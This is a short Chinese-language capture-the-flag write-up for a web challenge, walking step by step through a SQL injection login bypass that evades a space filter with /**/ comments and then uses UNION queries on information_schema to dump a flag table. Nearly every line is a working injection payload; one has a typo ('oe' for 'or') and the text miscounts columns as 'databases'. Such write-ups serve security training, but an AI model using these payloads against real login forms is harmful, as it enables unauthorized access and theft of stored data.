进入题目,发现页面和之前的web2一样,试试看万能密码登陆:username=admin' or 1=1#&password=123
不出所料,万能钥匙还是被ban了,试试看过滤了什么
测试发现,题目过滤了空格,那么我们就用/**/来绕过空格:username=admin'/**/or/**/1=1#&password=123
发现可以成功登陆,接下来老方法,测试有几个数据库:username=admin'/**/or/**/1=1/**/order/**/by/**/3#&password=123
username=admin'/**/or/**/1=1/**/order/**/by/**/4#&password=123
到4时发现没有回显,说明有3个数据库
接下来查库名username=admin'/**/or/**/1=1/**/union/**/select/**/1,2,3#&password=123
看到回显位是2,查看这个2的数据库名:username=admin'/**/oe/**/1=1/**/union/**/select/**/1,database(),3#&password=123
查到数据库'web2',继续查这个库下的表名:username=admin'/**/or/**/1=1/**/union/**/select/**/1,group_concat(table_name),3/**/from/**/information_schema.tables/**/where/**/table_schema='web2'#
查到了flag和user两个表,接下来查flag这个表下的字段名:username=admin'/**/or/**/1=1/**/union/**/select/**/1,group_concat(column_name),3/**/from/**/information_schema.columns/**/where/**/table_name='flag'#
查到字段flag,查询字段内的信息:username=admin'/**/or/**/1=1/**/union/**/select/**/1,flag,3/**/from/**/flag#
成功拿到flag
